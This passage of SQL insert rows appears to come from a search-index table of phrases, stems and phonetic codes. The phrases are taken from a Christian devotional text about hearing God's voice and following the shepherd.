(295466, 'lord is what', 'lord is what', 0, 1, 1.4, 'L6323', 1, '*'),
(295467, 'lord it', 'lord it', 0, 1, 1.2333, 'L630', 1, '*'),
(295468, 'lord it is', 'lord it is', 0, 1, 1.3333, 'L632', 1, '*'),
(295469, 'lord saying', 'lord saying', 0, 1, 1.3667, 'L63252', 2, '*'),
(295470, 'lord saying whom', 'lord saying whom', 0, 1, 1.5333, 'L632525', 2, '*'),
(295471, 'lord that brings', 'lord that brings', 0, 1, 1.5333, 'L631652', 1, '*'),
(295472, 'lord that gives', 'lord that gives', 0, 1, 1.5, 'L63212', 1, '*'),
(295473, 'lord that guarantees', 'lord that guarantees', 0, 1, 1.6667, 'L6326532', 1, '*'),
(295474, 'lord that takes', 'lord that takes', 0, 1, 1.5, 'L632', 1, '*'),
(295475, 'lord when', 'lord when', 0, 1, 1.3, 'L635', 1, '*'),
(295476, 'lord when you', 'lord when you', 0, 1, 1.4333, 'L635', 1, '*'),
(295477, 'lord whenever the', 'lord whenever the', 0, 1, 1.5667, 'L635163', 1, '*'),
(295478, 'lose direction', 'lose direction', 0, 1, 1.4667, 'L236235', 1, '*'),
(295479, 'lose direction and', 'lose direction and', 0, 1, 1.6, 'L2362353', 1, '*'),
(295480, 'lose the voice', 'lose the voice', 0, 1, 1.4667, 'L2312', 1, '*'),
(295481, 'makes all', 'make all', 0, 1, 1.3, 'M240', 1, '*'),
(295482, 'makes all the', 'make all the', 0, 1, 1.4333, 'M243', 1, '*'),
(295483, 'man his life', 'man his life', 0, 1, 1.4, 'M241', 1, '*'),
(295484, 'man masters', 'man masters', 0, 1, 1.3667, 'M2362', 1, '*'),
(295485, 'man masters hearing', 'man masters hearing', 0, 1, 1.6333, 'M2362652', 1, '*'),
(295486, 'man with power', 'man with power', 0, 1, 1.4667, 'M316', 1, '*'),
(295487, 'many voices', 'mani voices', 0, 1, 1.3667, 'M120', 1, '*'),
(295488, 'many voices in', 'mani voices in', 0, 1, 1.4667, 'M125', 1, '*'),
(295489, 'master and respond', 'master and respond', 0, 1, 1.6, 'M2365362153', 1, '*'),
(295490, 'master so', 'master so', 0, 1, 1.3, 'M2362', 1, '*'),
(295491, 'master so well', 'master so well', 0, 1, 1.4667, 'M23624', 1, '*'),
(295492, 'masters', 'master', 0, 0, 0.4667, 'M2362', 1, '*'),
(295493, 'masters hearing', 'master hearing', 0, 1, 1.5, 'M2362652', 1, '*'),
(295494, 'masters hearing the', 'master hearing the', 0, 1, 1.6333, 'M23626523', 1, '*'),
(295495, 'me when', 'me when', 0, 1, 1.2333, 'M000', 1, '*'),
(295496, 'me when i', 'me when i', 0, 1, 1.3, 'M000', 1, '*'),
(295497, 'men are also', 'men are also', 0, 1, 1.4, 'M642', 1, '*'),
(295498, 'men struggle', 'men struggle', 0, 1, 1.4, 'M23624', 1, '*'),
(295499, 'men struggle in', 'men struggle in', 0, 1, 1.5, 'M236245', 1, '*'),
(295500, 'mercies into', 'merci into', 0, 1, 1.4, 'M6253', 1, '*'),
(295501, 'mercies into our', 'merci into our', 0, 1, 1.5333, 'M62536', 1, '*'),
(295502, 'me”.', 'me”.', 0, 0, 0.2667, 'M000', 1, '*'),
(295503, 'me”. the', 'me”. the', 0, 1, 1.2667, 'M300', 1, '*'),
(295504, 'me”. the voice', 'me”. the voice', 0, 1, 1.4667, 'M312', 1, '*'),
(295505, 'ministry two', 'ministri two', 0, 1, 1.4, 'M2363', 1, '*'),
(295506, 'ministry two subjects', 'ministri two subjects', 0, 1, 1.7, 'M236321232', 1, '*'),
(295507, 'missed the voice', 'miss the voice', 0, 1, 1.5333, 'M2312', 1, '*'),
(295508, 'more than never', 'more than never', 0, 1, 1.5, 'M63516', 1, '*'),
(295509, 'more to', 'more to', 0, 1, 1.2333, 'M630', 1, '*'),
(295510, 'more to listen', 'more to listen', 0, 1, 1.4667, 'M634235', 1, '*'),
(295511, 'much of god\'s', 'much of god', 0, 1, 1.4333, 'M21232', 1, '*'),
(295512, 'must master', 'must master', 0, 1, 1.3667, 'M235236', 1, '*'),
(295513, 'must master so', 'must master so', 0, 1, 1.4667, 'M2352362', 1, '*'),
(295514, 'never before', 'never before', 0, 1, 1.4, 'N1616', 1, '*'),
(295515, 'never before your', 'never before your', 0, 1, 1.5667, 'N1616', 1, '*'),
(295516, 'never failed', 'never failed', 0, 1, 1.4, 'N16143', 1, '*'),
(295517, 'never failed before', 'never failed before', 0, 1, 1.6333, 'N1614316', 1, '*'),
(295518, 'new heights and', 'new heights and', 0, 1, 1.5, 'N23253', 1, '*'),
(295519, 'new mercies', 'new mercies', 0, 1, 1.3667, 'N620', 1, '*'),
(295520, 'new mercies into', 'new mercies into', 0, 1, 1.5333, 'N6253', 1, '*'),
(295521, 'new possibilities', 'new possibilities', 0, 1, 1.5667, 'N121432', 1, '*'),
(295522, 'new possibilities of', 'new possibilities of', 0, 1, 1.6667, 'N1214321', 1, '*'),
(295523, 'new realms in', 'new realms in', 0, 1, 1.4333, 'N64525', 1, '*'),
(295524, 'next level', 'next level', 0, 1, 1.3333, 'N23414', 1, '*'),
(295525, 'next level is', 'next level is', 0, 1, 1.4333, 'N234142', 1, '*'),
(295526, 'not follow', 'not follow', 0, 1, 1.3333, 'N314', 1, '*'),
(295527, 'not follow but', 'not follow but', 0, 1, 1.4667, 'N31413', 1, '*'),
(295528, 'not hearing', 'not hearing', 0, 1, 1.3667, 'N3652', 1, '*'),
(295529, 'not hearing correctly', 'not hearing correctly', 0, 1, 1.7, 'N36526234', 1, '*'),
(295530, 'not listening', 'not listening', 0, 1, 1.4333, 'N342352', 1, '*'),
(295531, 'not listening to', 'not listening to', 0, 1, 1.5333, 'N3423523', 1, '*'),
(295532, 'not the voice', 'not the voice', 0, 1, 1.4333, 'N312', 1, '*'),
(295533, 'of every', 'of every', 0, 1, 1.2667, 'O160', 1, '*'),
(295534, 'of every sheep', 'of every sheep', 0, 1, 1.4667, 'O1621', 1, '*'),
(295535, 'of god somewhere', 'of god somewhere', 0, 1, 1.5333, 'O123256', 1, '*'),
(295536, 'of god we', 'of god we', 0, 1, 1.3, 'O123', 1, '*'),
(295537, 'of god\'s voice', 'of god voice', 0, 1, 1.4667, 'O123212', 1, '*'),
(295538, 'of life to', 'of life to', 0, 1, 1.3333, 'O1413', 1, '*'),
(295539, 'of not', 'of not', 0, 1, 1.2, 'O153', 1, '*'),
(295540, 'of not listening', 'of not listening', 0, 1, 1.5333, 'O15342352', 1, '*'),
(295541, 'of samuel', 'of samuel', 0, 1, 1.3, 'O1254', 1, '*'),
(295542, 'of samuel only', 'of samuel only', 0, 1, 1.4667, 'O125454', 1, '*'),
(295543, 'of speaking', 'of speaking', 0, 1, 1.3667, 'O121252', 1, '*'),
(295544, 'of speaking to', 'of speaking to', 0, 1, 1.4667, 'O1212523', 1, '*'),
(295545, 'of strangers', 'of strangers', 0, 1, 1.4, 'O12365262', 1, '*'),
(295546, 'of strangers your', 'of strangers your', 0, 1, 1.5667, 'O123652626', 1, '*'),
(295547, 'of that sheep', 'of that sheep', 0, 1, 1.4333, 'O1321', 1, '*'),
(295548, 'of your son-ship', 'of your son-ship', 0, 1, 1.5333, 'O162521', 1, '*'),
(295549, 'on how', 'on how', 0, 1, 1.2, 'O500', 1, '*'),
(295550, 'on how much', 'on how much', 0, 1, 1.3667, 'O520', 1, '*'),
(295551, 'on the journey', 'on the journey', 0, 1, 1.4667, 'O53265', 1, '*'),
(295552, 'one voice', 'on voice', 0, 1, 1.3, 'O512', 1, '*'),
(295553, 'one voice that', 'on voice that', 0, 1, 1.4667, 'O5123', 1, '*'),
(295554, 'only one', 'onli one', 0, 1, 1.2667, 'O545', 1, '*'),
(295555, 'only one voice', 'onli one voice', 0, 1, 1.4667, 'O54512', 1, '*'),
(295556, 'only went', 'onli went', 0, 1, 1.3, 'O5453', 1, '*'),
(295557, 'only went upward', 'onli went upward', 0, 1, 1.5333, 'O5453163', 1, '*'),
(295558, 'opens new', 'open new', 0, 1, 1.3, 'O1525', 1, '*'),
(295559, 'opens new possibilities', 'open new possibilities', 0, 1, 1.7667, 'O1525121432', 1, '*'),
(295560, 'or they', 'or they', 0, 1, 1.2333, 'O630', 1, '*'),
(295561, 'or they are', 'or they are', 0, 1, 1.3667, 'O636', 1, '*'),
(295562, 'our daily', 'our daily', 0, 1, 1.3, 'O634', 1, '*'),
(295563, 'our daily allocations', 'our daily allocations', 0, 1, 1.7, 'O6342352', 1, '*'),
(295564, 'our lives it', 'our lives it', 0, 1, 1.4, 'O64123', 1, '*'),
(295565, 'our safety', 'our safety', 0, 1, 1.3333, 'O6213', 1, '*'),
(295566, 'our safety security', 'our safety security', 0, 1, 1.6333, 'O6213263', 1, '*'),
(295567, 'outcry', 'outcri', 0, 0, 0.4, 'O326', 1, '*'),
(295568, 'outcry be', 'outcri be', 0, 1, 1.3, 'O3261', 1, '*'),
(295569, 'outcry be in', 'outcri be in', 0, 1, 1.4, 'O32615', 1, '*'),
(295570, 'own sheep', 'own sheep', 0, 1, 1.3, 'O521', 1, '*'),
(295571, 'own sheep he', 'own sheep he', 0, 1, 1.4, 'O521', 1, '*'),
(295572, 'participation', 'particip', 0, 0, 0.8667, 'P632135', 1, '*'),
(295573, 'participation of', 'particip of', 0, 1, 1.5333, 'P6321351', 1, '*'),
(295574, 'participation of the', 'particip of the', 0, 1, 1.6667, 'P63213513', 1, '*'),
(295575, 'people struggle', 'peopl struggle', 0, 1, 1.5, 'P423624', 1, '*'),
(295576, 'people struggle in', 'peopl struggle in', 0, 1, 1.6, 'P4236245', 1, '*'),
(295577, 'perpetual', 'perpetu', 0, 0, 0.6, 'P6134', 1, '*'),
(295578, 'perpetual victory', 'perpetu victory', 0, 1, 1.5667, 'P61341236', 1, '*'),
(295579, 'perpetual victory as', 'perpetu victory as', 0, 1, 1.6667, 'P613412362', 1, '*'),
(295580, 'picks up', 'pick up', 0, 1, 1.2667, 'P210', 1, '*'),
(295581, 'picks up i', 'pick up i', 0, 1, 1.3333, 'P210', 1, '*'),
(295582, 'point on', 'point on', 0, 1, 1.2667, 'P535', 2, '*'),
(295583, 'point on the', 'point on the', 0, 1, 1.4, 'P5353', 1, '*'),
(295584, 'possibilities', 'possibl', 0, 0, 0.8667, 'P21432', 1, '*'),
(295585, 'possibilities of', 'possibl of', 0, 1, 1.5333, 'P214321', 1, '*'),
(295586, 'possibilities of life', 'possibl of life', 0, 1, 1.7, 'P21432141', 1, '*'),
(295587, 'power it', 'power it', 0, 1, 1.2667, 'P630', 1, '*'),
(295588, 'power it is', 'power it is', 0, 1, 1.3667, 'P632', 1, '*'),
(295589, 'progress and', 'progress and', 0, 1, 1.4, 'P626253', 1, '*'),
(295590, 'progress and success', 'progress and success', 0, 1, 1.6667, 'P6262532', 1, '*'),
(295591, 'proof', 'proof', 0, 0, 0.3333, 'P610', 1, '*'),
(295592, 'proof of', 'proof of', 0, 1, 1.2667, 'P610', 1, '*'),
(295593, 'proof of your', 'proof of your', 0, 1, 1.4333, 'P616', 1, '*'),
(295594, 'putteth', 'putteth', 0, 0, 0.4667, 'P300', 1, '*'),
(295595, 'putteth forth', 'putteth forth', 0, 1, 1.4333, 'P3163', 1, '*'),
(295596, 'putteth forth his', 'putteth forth his', 0, 1, 1.5667, 'P31632', 1, '*'),
(295597, 'realms in', 'realm in', 0, 1, 1.3, 'R4525', 1, '*'),
(295598, 'realms in god', 'realm in god', 0, 1, 1.4333, 'R452523', 1, '*'),
(295599, 'recognize and', 'recogn and', 0, 1, 1.4333, 'R25253', 1, '*'),
(295600, 'recognize and obey', 'recogn and obey', 0, 1, 1.6, 'R252531', 1, '*'),
(295601, 'recognize the', 'recogn the', 0, 1, 1.4333, 'R2523', 2, '*'),
(295602, 'recognize the shepherd\'s', 'recogn the shepherd', 0, 1, 1.8, 'R252321632', 1, '*'),
(295603, 'respond to', 'respond to', 0, 1, 1.3333, 'R2153', 1, '*'),
(295604, 'respond to always', 'respond to always', 0, 1, 1.5667, 'R215342', 1, '*'),
(295605, 'right hand', 'right hand', 0, 1, 1.3333, 'R2353', 1, '*'),
(295606, 'right hand and', 'right hand and', 0, 1, 1.4667, 'R235353', 1, '*'),
(295607, 's heart 19', 's heart 19', 0, 1, 1.3333, 'S630', 1, '*'),
(295608, 'safety in', 'safeti in', 0, 1, 1.3, 'S135', 1, '*'),
(295609, 'safety in 2017', 'safeti in 2017', 0, 1, 1.4667, 'S135', 1, '*'),
(295610, 'safety of', 'safeti of', 0, 1, 1.3, 'S131', 1, '*'),
(295611, 'safety of every', 'safeti of every', 0, 1, 1.5, 'S1316', 1, '*'),
(295612, 'safety security', 'safeti security', 0, 1, 1.5, 'S13263', 1, '*'),
(295613, 'safety security progress', 'safeti security progress', 0, 1, 1.8, 'S1326316262', 1, '*'),
(295614, 'said i here', 'said i here', 0, 1, 1.3667, 'S360', 2, '*'),
(295615, 'sam 3', 'sam 3', 0, 1, 1.1667, 'S500', 1, '*'),
(295616, 'sam 3 4', 'sam 3 4', 0, 1, 1.2333, 'S500', 1, '*'),
(295617, 'samuel and he', 'samuel and he', 0, 1, 1.4333, 'S5453', 1, '*'),
(295618, 'samuel only', 'samuel only', 0, 1, 1.3667, 'S5454', 1, '*'),
(295619, 'samuel only went', 'samuel only went', 0, 1, 1.5333, 'S545453', 1, '*'),
(295620, 'saying whom', 'sai whom', 0, 1, 1.3667, 'S525', 2, '*'),
(295621, 'saying whom shall', 'sai whom shall', 0, 1, 1.5667, 'S52524', 2, '*'),
(295622, 'saying “also', 'sai “also', 0, 1, 1.4, 'S5242', 1, '*'),
(295623, 'saying “also i', 'sai “also i', 0, 1, 1.4667, 'S5242', 1, '*'),
(295624, 'says and', 'sai and', 0, 1, 1.2667, 'S530', 4, '*'),
(295625, 'says and thine', 'sai and thine', 0, 1, 1.4667, 'S535', 1, '*'),
(295626, 'says and when', 'sai and when', 0, 1, 1.4333, 'S535', 1, '*'),
(295627, 'says “the lord', 'sai “the lord', 0, 1, 1.4667, 'S3463', 1, '*'),
(295628, 'security', 'secur', 0, 0, 0.5333, 'S630', 1, '*'),
(295629, 'security and', 'secur and', 0, 1, 1.4, 'S6353', 1, '*'),
(295630, 'security and safety', 'secur and safety', 0, 1, 1.6333, 'S6353213', 1, '*'),
(295631, 'security progress', 'secur progress', 0, 1, 1.5667, 'S6316262', 1, '*'),
(295632, 'security progress and', 'secur progress and', 0, 1, 1.7, 'S631626253', 1, '*'),
(295633, 'see men struggle', 'see men struggle', 0, 1, 1.5333, 'S523624', 1, '*'),
(295634, 'see people', 'see people', 0, 1, 1.3333, 'S140', 1, '*'),
(295635, 'see people struggle', 'see people struggle', 0, 1, 1.6333, 'S1423624', 1, '*'),
(295636, 'send and', 'send and', 0, 1, 1.2667, 'S5353', 2, '*'),
(295637, 'send and who', 'send and who', 0, 1, 1.4, 'S5353', 2, '*'),
(295638, 'send me”.', 'send me”.', 0, 1, 1.3, 'S535', 1, '*'),
(295639, 'send me”. the', 'send me”. the', 0, 1, 1.4333, 'S5353', 1, '*'),
(295640, 'shall hear', 'shall hear', 0, 1, 1.3333, 'S460', 1, '*'),
(295641, 'shall hear a', 'shall hear a', 0, 1, 1.4, 'S460', 1, '*'),
(295642, 'shall i send', 'shall i send', 0, 1, 1.4, 'S4253', 2, '*'),
(295643, 'sheep', 'sheep', 0, 0, 0.3333, 'S100', 1, '*'),
(295644, 'sheep follow', 'sheep follow', 0, 1, 1.4, 'S140', 1, '*'),
(295645, 'sheep follow him', 'sheep follow him', 0, 1, 1.5333, 'S145', 1, '*'),
(295646, 'sheep he', 'sheep he', 0, 1, 1.2667, 'S100', 1, '*'),
(295647, 'sheep he goeth', 'sheep he goeth', 0, 1, 1.4667, 'S123', 1, '*'),
(295648, 'sheep is', 'sheep is', 0, 1, 1.2667, 'S120', 1, '*'),
(295649, 'sheep is in', 'sheep is in', 0, 1, 1.3667, 'S125', 1, '*'),
(295650, 'sheep to', 'sheep to', 0, 1, 1.2667, 'S130', 1, '*'),
(295651, 'sheep to recognize', 'sheep to recognize', 0, 1, 1.6, 'S136252', 1, '*'),
(295652, 'shepherd\'s', 'shepherd', 0, 0, 0.6667, 'S1632', 1, '*'),
(295653, 'shepherd\'s voice', 'shepherd voice', 0, 1, 1.5333, 'S163212', 1, '*'),
(295654, 'shepherd\'s voice the', 'shepherd voice the', 0, 1, 1.6667, 'S1632123', 1, '*'),
(295655, 'so well', 'so well', 0, 1, 1.2333, 'S400', 1, '*'),
(295656, 'so well how', 'so well how', 0, 1, 1.3667, 'S400', 1, '*'),
(295657, 'somewhere that', 'somewher that', 0, 1, 1.4667, 'S563', 1, '*'),
(295658, 'somewhere that has', 'somewher that has', 0, 1, 1.6, 'S5632', 1, '*'),
(295659, 'son-ship', 'son-ship', 0, 0, 0.5333, 'S521', 1, '*'),
(295660, 'son-ship is', 'son-ship is', 0, 1, 1.3667, 'S5212', 1, '*'),
(295661, 'son-ship is in', 'son-ship is in', 0, 1, 1.4667, 'S52125', 1, '*'),
(295662, 'speaking to', 'speak to', 0, 1, 1.3667, 'S12523', 1, '*'),
(295663, 'speaking to his', 'speak to his', 0, 1, 1.5, 'S125232', 1, '*'),
(295664, 'spirit and how', 'spirit and how', 0, 1, 1.4667, 'S16353', 1, '*'),
(295665, 'started ministry', 'start ministry', 0, 1, 1.5333, 'S3635236', 1, '*'),
(295666, 'started ministry two', 'start ministry two', 0, 1, 1.6667, 'S36352363', 1, '*'),
(295667, 'stranded', 'strand', 0, 0, 0.5333, 'S3653', 1, '*'),
(295668, 'stranded they', 'strand they', 0, 1, 1.4333, 'S3653', 1, '*'),
(295669, 'stranded they missed', 'strand they missed', 0, 1, 1.6667, 'S3653523', 1, '*'),
(295670, 'stranger', 'stranger', 0, 0, 0.5333, 'S36526', 1, '*'),
(295671, 'stranger will', 'stranger will', 0, 1, 1.4333, 'S365264', 1, '*'),
(295672, 'stranger will they', 'stranger will they', 0, 1, 1.6, 'S3652643', 1, '*'),
(295673, 'strangers', 'stranger', 0, 0, 0.6, 'S365262', 1, '*'),
(295674, 'strangers your', 'stranger your', 0, 1, 1.4667, 'S3652626', 1, '*'),
(295675, 'strangers your security', 'stranger your security', 0, 1, 1.7667, 'S3652626263', 1, '*'),
(295676, 'struggle in life', 'struggl in life', 0, 1, 1.5333, 'S3624541', 1, '*'),
(295677, 'subjects', 'subject', 0, 0, 0.5333, 'S1232', 1, '*'),
(295678, 'subjects that', 'subject that', 0, 1, 1.4333, 'S12323', 1, '*'),
(295679, 'subjects that i', 'subject that i', 0, 1, 1.5, 'S12323', 1, '*'),
(295680, 'success in life', 'success in life', 0, 1, 1.5, 'S541', 1, '*'),
(295681, 'takes us', 'take us', 0, 1, 1.2667, 'T200', 1, '*'),
(295682, 'takes us to', 'take us to', 0, 1, 1.3667, 'T230', 1, '*'),
(295683, 'than never', 'than never', 0, 1, 1.3333, 'T516', 1, '*'),
(295684, 'than never before', 'than never before', 0, 1, 1.5667, 'T51616', 1, '*'),
(295685, 'that brings', 'that brings', 0, 1, 1.3667, 'T1652', 1, '*'),
(295686, 'that brings new', 'that brings new', 0, 1, 1.5, 'T16525', 1, '*'),
(295687, 'that comes to', 'that comes to', 0, 1, 1.4333, 'T2523', 1, '*'),
(295688, 'that gives us', 'that gives us', 0, 1, 1.4333, 'T212', 1, '*'),
(295689, 'that god wants', 'that god wants', 0, 1, 1.4667, 'T23532', 3, '*'),
(295690, 'that guarantees', 'that guarantees', 0, 1, 1.5, 'T26532', 1, '*'),
(295691, 'that guarantees our', 'that guarantees our', 0, 1, 1.6333, 'T265326', 1, '*'),
(295692, 'that has never', 'that has never', 0, 1, 1.4667, 'T2516', 1, '*'),
(295693, 'that i must', 'that i must', 0, 1, 1.3667, 'T523', 1, '*'),
(295694, 'that point', 'that point', 0, 1, 1.3333, 'T153', 2, '*'),
(295695, 'that point on', 'that point on', 0, 1, 1.4333, 'T1535', 2, '*'),
(295696, 'that sheep', 'that sheep', 0, 1, 1.3333, 'T210', 1, '*'),
(295697, 'that sheep to', 'that sheep to', 0, 1, 1.4333, 'T213', 1, '*'),
(295698, 'that takes', 'that takes', 0, 1, 1.3333, 'T200', 1, '*'),
(295699, 'that takes us', 'that takes us', 0, 1, 1.4333, 'T200', 1, '*'),
(295700, 'that will guaranty', 'that will guaranty', 0, 1, 1.6, 'T42653', 1, '*'),
(295701, 'the ability of', 'the ability of', 0, 1, 1.4667, 'T1431', 1, '*'),
(295702, 'the difference i', 'the difference i', 0, 1, 1.5333, 'T1652', 1, '*'),
(295703, 'the habit', 'the habit', 0, 1, 1.3, 'T130', 1, '*'),
(295704, 'the habit of', 'the habit of', 0, 1, 1.4, 'T131', 1, '*'),
(295705, 'the left.”', 'the left.”', 0, 1, 1.3333, 'T413', 1, '*'),
(295706, 'the left.” god', 'the left.” god', 0, 1, 1.4667, 'T41323', 1, '*'),
(295707, 'the lord any', 'the lord any', 0, 1, 1.4, 'T4635', 1, '*'),
(295708, 'the lord comes', 'the lord comes', 0, 1, 1.4667, 'T463252', 1, '*'),
(295709, 'the lord it', 'the lord it', 0, 1, 1.3667, 'T463', 1, '*'),
(295710, 'the lord saying', 'the lord saying', 0, 1, 1.5, 'T463252', 2, '*'),
(295711, 'the lord when', 'the lord when', 0, 1, 1.4333, 'T4635', 1, '*'),
(295712, 'the proof', 'the proof', 0, 1, 1.3, 'T161', 1, '*'),
(295713, 'the proof of', 'the proof of', 0, 1, 1.4, 'T161', 1, '*'),
(295714, 'the right hand', 'the right hand', 0, 1, 1.4667, 'T62353', 1, '*'),
(295715, 'the safety', 'the safety', 0, 1, 1.3333, 'T213', 1, '*'),
(295716, 'the safety of', 'the safety of', 0, 1, 1.4333, 'T2131', 1, '*'),
(295717, 'the sheep', 'the sheep', 0, 1, 1.3, 'T210', 1, '*'),
(295718, 'the sheep follow', 'the sheep follow', 0, 1, 1.5333, 'T214', 1, '*'),
(295719, 'the shepherd\'s', 'the shepherd', 0, 1, 1.4667, 'T21632', 1, '*'),
(295720, 'the shepherd\'s voice', 'the shepherd voice', 0, 1, 1.6667, 'T2163212', 1, '*'),
(295721, 'the way walk', 'the way walk', 0, 1, 1.4, 'T420', 1, '*'),
(295722, 'the world but', 'the world but', 0, 1, 1.4333, 'T64313', 1, '*'),
(295723, 'thee saying', 'thee saying', 0, 1, 1.3667, 'T252', 1, '*'),
(295724, 'thee saying this', 'thee saying this', 0, 1, 1.5333, 'T25232', 1, '*'),
(295725, 'them and the', 'them and the', 0, 1, 1.4, 'T530', 1, '*'),
(295726, 'then said i', 'then said i', 0, 1, 1.3667, 'T523', 2, '*'),
(295727, 'they are hearing', 'thei are hearing', 0, 1, 1.5333, 'T652', 1, '*'),
(295728, 'they know his', 'thei know his', 0, 1, 1.4333, 'T252', 1, '*'),
(295729, 'they know not', 'thei know not', 0, 1, 1.4333, 'T253', 1, '*'),
(295730, 'they missed', 'thei missed', 0, 1, 1.3667, 'T523', 1, '*'),
(295731, 'they missed the', 'thei missed the', 0, 1, 1.5, 'T523', 1, '*'),
(295732, 'they not', 'thei not', 0, 1, 1.2667, 'T530', 1, '*'),
(295733, 'they not follow', 'thei not follow', 0, 1, 1.5, 'T5314', 1, '*'),
(295734, 'thine ears', 'thine ears', 0, 1, 1.3333, 'T562', 1, '*'),
(295735, 'thine ears shall', 'thine ears shall', 0, 1, 1.5333, 'T5624', 1, '*'),
(295736, 'time i', 'time i', 0, 1, 1.2, 'T500', 1, '*'),
(295737, 'time i see', 'time i see', 0, 1, 1.3333, 'T520', 1, '*'),
(295738, 'time we lose', 'time we lose', 0, 1, 1.4, 'T542', 1, '*'),
(295739, 'to always', 'to always', 0, 1, 1.3, 'T420', 1, '*'),
(295740, 'to always and', 'to always and', 0, 1, 1.4333, 'T4253', 1, '*'),
(295741, 'to be led', 'to be led', 0, 1, 1.3, 'T143', 1, '*'),
(295742, 'to develop more', 'to develop more', 0, 1, 1.5, 'T14156', 1, '*'),
(295743, 'to hear god\'s', 'to hear god', 0, 1, 1.4333, 'T6232', 1, '*'),
(295744, 'to his voice', 'to his voice', 0, 1, 1.4, 'T212', 1, '*'),
(295745, 'to learn more', 'to learn more', 0, 1, 1.4333, 'T4656', 1, '*'),
(295746, 'to listen', 'to listen', 0, 1, 1.3, 'T4235', 1, '*'),
(295747, 'to listen to', 'to listen to', 0, 1, 1.4, 'T42353', 1, '*'),
(295748, 'to live', 'to live', 0, 1, 1.2333, 'T410', 1, '*'),
(295749, 'to live by', 'to live by', 0, 1, 1.3333, 'T410', 1, '*'),
(295750, 'to master', 'to master', 0, 1, 1.3, 'T5236', 1, '*'),
(295751, 'to master and', 'to master and', 0, 1, 1.4333, 'T523653', 1, '*'),
(295752, 'to new', 'to new', 0, 1, 1.2, 'T500', 1, '*'),
(295753, 'to new heights', 'to new heights', 0, 1, 1.4667, 'T5232', 1, '*'),
(295754, 'to recognize', 'to recognize', 0, 1, 1.4, 'T6252', 2, '*'),
(295755, 'to recognize the', 'to recognize the', 0, 1, 1.5333, 'T62523', 2, '*'),
(295756, 'to the left.”', 'to the left.”', 0, 1, 1.4333, 'T413', 1, '*'),
(295757, 'to the voice', 'to the voice', 0, 1, 1.4, 'T120', 1, '*'),
(295758, 'to us the', 'to us the', 0, 1, 1.3, 'T230', 1, '*'),
(295759, 'to your ability', 'to your ability', 0, 1, 1.5, 'T6143', 1, '*'),
(295760, 'told me when', 'told me when', 0, 1, 1.4, 'T435', 1, '*'),
(295761, 'turn to the', 'turn to the', 0, 1, 1.3667, 'T653', 1, '*'),
(295762, 'two subjects', 'two subjects', 0, 1, 1.4, 'T21232', 1, '*'),
(295763, 'two subjects that', 'two subjects that', 0, 1, 1.5667, 'T212323', 1, '*'),
(295764, 'up i sam', 'up i sam', 0, 1, 1.2667, 'U125', 1, '*'),
(295765, 'us and opens', 'us and opens', 0, 1, 1.4, 'U253152', 1, '*'),
(295766, 'us our', 'us our', 0, 1, 1.2, 'U260', 1, '*'),
(295767, 'us our daily', 'us our daily', 0, 1, 1.4, 'U2634', 1, '*'),
(295768, 'us the safety', 'us the safety', 0, 1, 1.4333, 'U23213', 1, '*'),
(295769, 'us then', 'us then', 0, 1, 1.2333, 'U235', 2, '*'),
(295770, 'us then said', 'us then said', 0, 1, 1.4, 'U23523', 2, '*'),
(295771, 'us to new', 'us to new', 0, 1, 1.3, 'U235', 1, '*'),
(295772, 'victory as', 'victori as', 0, 1, 1.3333, 'V2362', 1, '*'),
(295773, 'victory as you', 'victori as you', 0, 1, 1.4667, 'V2362', 1, '*'),
(295774, 'voice and a', 'voic and a', 0, 1, 1.3667, 'V253', 1, '*'),
(295775, 'voice isaiah', 'voic isaiah', 0, 1, 1.4, 'V200', 1, '*'),
(295776, 'voice isaiah 30', 'voic isaiah 30', 0, 1, 1.5, 'V200', 1, '*'),
(295777, 'voice of god', 'voic of god', 0, 1, 1.4, 'V2123', 1, '*'),
(295778, 'voice of strangers', 'voic of strangers', 0, 1, 1.6, 'V212365262', 1, '*'),
(295779, 'voice that', 'voic that', 0, 1, 1.3333, 'V230', 1, '*'),
(295780, 'voice that comes', 'voic that comes', 0, 1, 1.5333, 'V23252', 1, '*'),
(295781, 'voice that god', 'voic that god', 0, 1, 1.4667, 'V2323', 1, '*'),
(295782, 'voice the', 'voic the', 0, 1, 1.3, 'V230', 1, '*'),
(295783, 'voice the proof', 'voic the proof', 0, 1, 1.5, 'V23161', 1, '*'),
(295784, 'voice there', 'voic there', 0, 1, 1.3667, 'V236', 1, '*'),
(295785, 'voice there are', 'voic there are', 0, 1, 1.5, 'V236', 1, '*'),
(295786, 'voice when', 'voic when', 0, 1, 1.3333, 'V250', 1, '*'),
(295787, 'voice when a', 'voic when a', 0, 1, 1.4, 'V250', 1, '*'),
(295788, 'voice you', 'voic you', 0, 1, 1.3, 'V200', 1, '*'),
(295789, 'voice you can', 'voic you can', 0, 1, 1.4333, 'V250', 1, '*'),
(295790, 'voices', 'voic', 0, 0, 0.4, 'V200', 1, '*'),
(295791, 'voices in', 'voic in', 0, 1, 1.3, 'V250', 1, '*'),
(295792, 'voices in the', 'voic in the', 0, 1, 1.4333, 'V253', 1, '*'),
(295793, 'walk ye', 'walk ye', 0, 1, 1.2333, 'W420', 1, '*'),
(295794, 'walk ye in', 'walk ye in', 0, 1, 1.3333, 'W425', 1, '*'),
(295795, 'want you in', 'want you in', 0, 1, 1.3667, 'W535', 1, '*'),
(295796, 'way walk', 'wai walk', 0, 1, 1.2667, 'W420', 1, '*'),
(295797, 'way walk ye', 'wai walk ye', 0, 1, 1.3667, 'W420', 1, '*'),
(295798, 'we lose', 'we lose', 0, 1, 1.2333, 'W420', 1, '*'),
(295799, 'we lose direction', 'we lose direction', 0, 1, 1.5667, 'W4236235', 1, '*'),
(295800, 'we lose the', 'we lose the', 0, 1, 1.3667, 'W423', 1, '*'),
(295801, 'well how', 'well how', 0, 1, 1.2667, 'W400', 1, '*'),
(295802, 'well how to', 'well how to', 0, 1, 1.3667, 'W430', 1, '*'),
(295803, 'went upward', 'went upward', 0, 1, 1.3667, 'W53163', 1, '*'),
(295804, 'went upward and', 'went upward and', 0, 1, 1.5, 'W5316353', 1, '*'),
(295805, 'what makes all', 'what makes all', 0, 1, 1.4667, 'W3524', 1, '*'),
(295806, 'when he putteth', 'when he putteth', 0, 1, 1.5, 'W513', 1, '*'),
(295807, 'when i started', 'when i started', 0, 1, 1.4667, 'W52363', 2, '*'),
(295808, 'when ye', 'when ye', 0, 1, 1.2333, 'W500', 1, '*'),
(295809, 'when ye turn', 'when ye turn', 0, 1, 1.4, 'W5365', 1, '*'),
(295810, 'when you see', 'when you see', 0, 1, 1.4, 'W520', 1, '*'),
